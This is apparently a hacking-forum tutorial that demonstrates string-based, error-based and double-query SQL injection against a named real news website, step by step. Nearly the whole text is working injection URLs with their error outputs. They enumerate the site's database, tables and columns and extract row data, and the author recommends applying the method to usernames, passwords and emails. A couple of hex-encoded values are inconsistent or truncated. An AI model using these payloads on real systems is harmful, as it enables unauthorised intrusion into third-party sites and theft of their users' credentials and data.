An Sqli hack. From string based to error based to double query injection.

An Sqli hack. From string based to error based to double query injection. Shout out to my good friend zerofreak who helped me with syntax issues and help me with this method.

Ok So today the vulnerable site in question and demonstration is.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493

We start like any other sqli test with the ' at the end of the URL.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'

We see:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1493''' at line 1

First sign that it is vulnerable now lets continue to count the columns. For this we do an Order by.

Lets start with 20.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 20--

Page returns with no error so 20+ columns exist. Lets continue...

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 25--

Still no error. Lets go higher.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 30--

Still no error. At this point I have an idea of what may be happening so I do.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 30--+

Unknown column '30' in 'order clause'

As you see adding the new command operators has triggered the error. This is called string base injection.

Now we have to figure out the correct number of columns with our new injection method.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 20--+

Unknown column '20' in 'order clause'

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 19--+

No error. Means 19 columns exist. Now lets get vulnerable column number.

For this we use union select.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-

The used SELECT statements have a different number of columns

WTF you may ask? This can happen quite regularly. It does not mean you have done anything wrong. We both know we have correctly counted the columns and that are syntax was correct. We now just have to switch injection method to Error Based.

First we want to get the database.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

There we go. The name of the database:

[Image: Rllvv.jpg]

'fairfax~1'

Next lets get the tables.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

[Image: vB74j.jpg]

Unfortunately the tables in this database are pretty crappy so I am for demonstration purposes I am using the first table in the database to extract data from via the first two columns.

The response we got for the first table was:

Duplicate entry 'archive_view~1' for key 1

We will need to hex the table name for our next command when we get the column data contained within the table.

Important disregard the ~1 of the table name and just 'text to hex' archive_view

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x617263686976655f7669657 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

It loads normally so that indicates to us that we need to switch to double query injection. God damn.

Double query is basically doubling the query to throw errors which will contain vital data within it.

However it involves a little more hexing, we need to hex the database name and the table name within our query.

So lets hex each of them:

Database

Quote:fairfax = 666169726661780920


Table name.

Quote:archive_view = 617263686976655f76696577


And in our query:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

We see the name of our first column:

[Image: eHJI2.jpg]

To go to the next column we change the query to:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 1,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

Etc etc.

So now we know this:

Table is called archive_view

The first two columns of archive_view table are called:

id

And

pubdate

Now lets extract the data contained within the columns from the table.

As this is double query each column has to be done seperately. Its not like regular sqli in which username and password can both we extracted and delivered at the same time.

Below we have to specify the table name we are extracting from, the column name we are extracting from the table and the database name.

This is how the query looks:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.id as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And you get the data contained for the first result within the id column in the archive_view table:

[Image: qxk9V.jpg]

You can also implement the query via the 0,1 if for example your extracting usernames or passwords.

Now lets do the second column called pubdate.

We simple change the id to pubdate in the query like below:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.pubdate as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And there we go. It looks like this:

[Image: FjJuh.jpg]

We have recovered data from two sets of columns from the first table within the database using several different forms of sqli. In an ideal situation you would apply these methods to username and password and email extraction.

Hope you's enjoyed the tutorial. Brought to you by VipVince.